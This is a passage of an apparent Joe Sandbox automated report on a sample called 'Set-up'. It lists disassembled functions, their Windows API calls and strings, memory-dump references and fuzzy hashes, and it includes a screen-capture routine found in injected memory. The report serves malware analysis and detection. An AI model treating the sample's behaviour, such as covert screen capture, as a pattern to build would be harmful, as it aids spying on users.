                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$AddressHandleModuleProc
                                                                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                  • API String ID: 1762409328-1355242751
                                                                                                                                  • Opcode ID: 94450ac512f450fbd8fe0ac61debe457c26c6b05db9cd76f1963e26a1eaa4443
                                                                                                                                  • Instruction ID: 14647e6994c73c56f27857b6d258df496be8585eaa1fa08822ae8fd85f13d862
                                                                                                                                  • Opcode Fuzzy Hash: 94450ac512f450fbd8fe0ac61debe457c26c6b05db9cd76f1963e26a1eaa4443
                                                                                                                                  • Instruction Fuzzy Hash: CCF0A935754108A7C728ABB9BC9996EB7A9EB8921170105BEF516C3244DE756C048790
                                                                                                                                  Function 00F05A40 Relevance: 12.1, APIs: 8, Instructions: 135timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(00000008,460C02D8,00000000), ref: 00F05A92
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00F05AA7
                                                                                                                                  • __aulldiv.LIBCMT ref: 00F05ABF
                                                                                                                                  • __aulldiv.LIBCMT ref: 00F05AED
                                                                                                                                  • __aulldiv.LIBCMT ref: 00F05B0A
                                                                                                                                  • __aulldiv.LIBCMT ref: 00F05B56
                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000008,00000000,?,000F4240,00000000,00000000,?,000F4240,00000000,?,?,000F4240,00000000,00000000,?,000F4240), ref: 00F05B8E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv$CriticalSectionTime$EnterFileLeaveSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3016372432-0
                                                                                                                                  • Opcode ID: 17df7d3b768bc60d29cd3d1465b9eb8eae0aa4ea327ac9ed165e24c52369b250
                                                                                                                                  • Instruction ID: f94392043b53f3fa704769be7aed4b65e77e024ac43dca0cb3dfff5e962caf07
                                                                                                                                  • Opcode Fuzzy Hash: 17df7d3b768bc60d29cd3d1465b9eb8eae0aa4ea327ac9ed165e24c52369b250
                                                                                                                                  • Instruction Fuzzy Hash: F841C5B1E00219ABCB18DF68CC85FAFBBB9EB84B10F104125E914B7284D7B5AD40DB94
                                                                                                                                  Function 00E49EE0 Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 123COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetLastError.KERNEL32(000000EA,00000000,00000000,?,00000000,?,00E44955,0131A976,00000000,00000000,00000000,?,00000000,01217A7C,?,00000000), ref: 00E49F35
                                                                                                                                    • Part of subcall function 00E4A3C0: SetLastError.KERNEL32(0000000E,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,01217A7C,?,00000000,, function ',0000000C), ref: 00E4A7B7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: NumCast$value >= 0
                                                                                                                                  • API String ID: 1452528299-661659576
                                                                                                                                  • Opcode ID: 332cf6126219107996983232f0576fef0d3fccb596d0d2fc18dac0b5c7fc319f
                                                                                                                                  • Instruction ID: c259f20a575aeb820dd19a237d5f6d0e30f077d608baa413cc591f783827d776
                                                                                                                                  • Opcode Fuzzy Hash: 332cf6126219107996983232f0576fef0d3fccb596d0d2fc18dac0b5c7fc319f
                                                                                                                                  • Instruction Fuzzy Hash: 8A3112717002016BDB289F25FC89ABFB798EF88365F005169FD19F6281DB31A85497A2
                                                                                                                                  Function 05911E50 Relevance: 12.1, APIs: 8, Instructions: 71windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 05911E59
                                                                                                                                  • GetCurrentObject.GDI32(00000000,00000007), ref: 05911E7C
                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 05911E8C
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 05911E9B
                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 05911EA2
                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 05911EAD
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 05911EB9
                                                                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 05911EDC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2843486406-0
                                                                                                                                  • Opcode ID: 75904c5ecccf8034ddd51dec602bbfc3d54b646d39eda5a96e6469d057050a6c
                                                                                                                                  • Instruction ID: 78e98c91639c0497d9cbb0dbbbed524a64e2f63fa6e223df81d5a514f370f746
                                                                                                                                  • Opcode Fuzzy Hash: 75904c5ecccf8034ddd51dec602bbfc3d54b646d39eda5a96e6469d057050a6c
                                                                                                                                  • Instruction Fuzzy Hash: 9821AF75158308AFD7209F21DC4AB6F7EA8EB99700F000519FA5992250DB7499058F62
                                                                                                                                  Function 00F0D5F0 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 426COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FoldStringW.KERNEL32(000000B0,?,?,00000000,00000000,460C02D8), ref: 00F0D661
                                                                                                                                  • FoldStringW.KERNEL32(000000B0,?,?,00000000,00000000,00000000), ref: 00F0D6C0
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00F0D90F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FoldString$Concurrency::cancel_current_task
                                                                                                                                  • String ID: Fold$in.n < NCINT_MAX
                                                                                                                                  • API String ID: 2785977467-429990129
                                                                                                                                  • Opcode ID: 781e2d4d8706616ec5a24501ebc9aae03eaf6d193faa62ef7a10d195430cdf5d
                                                                                                                                  • Instruction ID: c383a5dd8a53122e082e5669ba921e01c31132b5f29cf1382e06848733fded4d
                                                                                                                                  • Opcode Fuzzy Hash: 781e2d4d8706616ec5a24501ebc9aae03eaf6d193faa62ef7a10d195430cdf5d
                                                                                                                                  • Instruction Fuzzy Hash: F70215B5E002099FDF14CFA8C894BEEBBF5BF04314F148169E815AB281D775AA44EF90
                                                                                                                                  Function 00E56C80 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 227COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E56EDE
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionException@8RaiseThrow
                                                                                                                                  • String ID: parameter value; expecting 'y', 'n', or 'd'.$Invalid -$def$default$yes
                                                                                                                                  • API String ID: 3976011213-182719399
                                                                                                                                  • Opcode ID: 04cffa85de01eccb66ba9de660b194d25f0bd04bea791fe96c7da63075e3ad2e
                                                                                                                                  • Instruction ID: f147818e0b8495f399cd7d7d4b833c783de227be79d0b15e9e5edcdce1da7cbd
                                                                                                                                  • Opcode Fuzzy Hash: 04cffa85de01eccb66ba9de660b194d25f0bd04bea791fe96c7da63075e3ad2e
                                                                                                                                  • Instruction Fuzzy Hash: 92919BB5E002089BDF10DFA4D945BEEBBF8EF15319F508459EC14B7281DB76AA09CB60
                                                                                                                                  Function 00E3BE90 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 168COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E3BF48
                                                                                                                                  Strings
                                                                                                                                  • Use -ignoreUpgradeAccess to install this version anyway., xrefs: 00E3BF01
                                                                                                                                  • Update failed: , xrefs: 00E3BF5D
                                                                                                                                  • `anonymous-namespace'::HandleResultFailure, xrefs: 00E3BFC8
                                                                                                                                  • A log file for this update is stored in directory:, xrefs: 00E3BF89
                                                                                                                                  • result.Get() && result->IsFailure(), xrefs: 00E3BFCD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                  • String ID: A log file for this update is stored in directory:$Use -ignoreUpgradeAccess to install this version anyway.$Update failed: $`anonymous-namespace'::HandleResultFailure$result.Get() && result->IsFailure()
                                                                                                                                  • API String ID: 2005118841-1237414699
                                                                                                                                  • Opcode ID: 56b7103d206d4384ece1b491bedb98dffedce62f3f1d78c7f0a80a11411a47aa
                                                                                                                                  • Instruction ID: f9539cc9e4a81b0adb0532eaa1ad31c5c20445a21171a0ef1b03ea97fc0ff02c
                                                                                                                                  • Opcode Fuzzy Hash: 56b7103d206d4384ece1b491bedb98dffedce62f3f1d78c7f0a80a11411a47aa
                                                                                                                                  • Instruction Fuzzy Hash: B151A171E04248EBCB14DFA4D94ABEEBBF8AF04304F144169F505B7281EB75AE08CB91
                                                                                                                                  Function 00E51BE0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 164COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleTitleW.KERNEL32(00000000,00000000,00000081,,?,460C02D8), ref: 00E51C95
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E51CA1
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E51D7B
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E51D82
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_taskConsoleErrorException@8LastThrowTitle
                                                                                                                                  • String ID: GetConsoleTitleW()$
                                                                                                                                  • API String ID: 3428956699-626820007
                                                                                                                                  • Opcode ID: 1655a7a539b063e8d127ce3d4be1fee923e508d335daa9388c89119f34b909af
                                                                                                                                  • Instruction ID: c81ddd32f750868c1450e24510bc57039a75525639f5684ecfe5dac085c86325
                                                                                                                                  • Opcode Fuzzy Hash: 1655a7a539b063e8d127ce3d4be1fee923e508d335daa9388c89119f34b909af
                                                                                                                                  • Instruction Fuzzy Hash: 7051D2706002059BDF28DB24C855BBEB7F9AF40746F10595DE816F72C0EBB5A988CB91
                                                                                                                                  Function 00E53300 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 143COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E53398
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                  • String ID: !af_$!af_ && length()$basic_ncstring<wchar_t>::back$datavect<struct SeqPtr<wchar_t> >::begin$datavect<struct SeqPtr<wchar_t> >::size
                                                                                                                                  • API String ID: 118556049-2988572226
                                                                                                                                  • Opcode ID: 9bdc1877c96bb4121ed18571be676779931fbf3f330e9ed93fff5dea5d095843
                                                                                                                                  • Instruction ID: 83de0fc8b82b9f1a80a279c5fb8519d097bf51c7c25050f9d0cd922a184a543c
                                                                                                                                  • Opcode Fuzzy Hash: 9bdc1877c96bb4121ed18571be676779931fbf3f330e9ed93fff5dea5d095843
                                                                                                                                  • Instruction Fuzzy Hash: 2F411170A00201DBDF25DF69C881B6AB7F5EB84755F149A2CE925772C1C7B1AE48CB90
                                                                                                                                  Function 00E8D4A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 130COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E8D50C
                                                                                                                                    • Part of subcall function 00E3A2C0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E3A2D7
                                                                                                                                    • Part of subcall function 00E3A2C0: ___std_exception_copy.LIBVCRUNTIME ref: 00E3A321
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
